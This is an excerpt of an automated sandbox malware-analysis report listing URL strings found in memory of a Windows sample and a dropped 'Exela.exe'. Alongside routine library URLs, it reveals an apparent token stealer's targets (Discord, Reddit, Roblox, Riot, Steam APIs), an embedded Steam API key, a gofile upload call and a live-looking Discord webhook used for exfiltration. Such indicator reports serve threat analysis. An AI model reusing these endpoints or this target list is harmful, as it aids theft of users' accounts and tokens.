SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1995329450.000002DCCF990000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://python.org
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989717007.000002DCCF57B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1984324624.000002DCCF57A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670503006.000002DCCF5DD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976604985.000002DCCF578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://python.org/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1995329450.000002DCCF990000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://python.org:80
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989619337.000002DCCF540000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670147114.000002DCCF0D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://account.riotgames.com/api/account/v1/user
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.reddit.com/api/access_token
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://accounts.reddit.com/api/access_tokenP
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.gofile.io/getServer
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999597567.000002DCD0850000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999597567.000002DCD0850000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bugs.python.org/issue37179
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1666188319.000002DCCF003000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF3A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965276250.000002DCCEF35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987824618.000002DCCEF8F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969639585.000002DCCEF69000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971932973.000002DCCEF8C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1666072230.000002DCCEF90000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1975476841.000002DCCEF8F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1665953761.000002DCCF003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bugs.python.org/issue42195.
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/avatars/P
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io
Source: Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/en/latest/changelog/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp String found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cryptography.io/en/latest/security/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v8/users/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_Ba
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989619337.000002DCCF540000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670767651.000002DCCED27000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974121570.000002DCCEF1D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF19000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://economy.roblox.com/v1/users/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://economy.roblox.com/v1/users/0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://filepreviews.io/
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777AD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
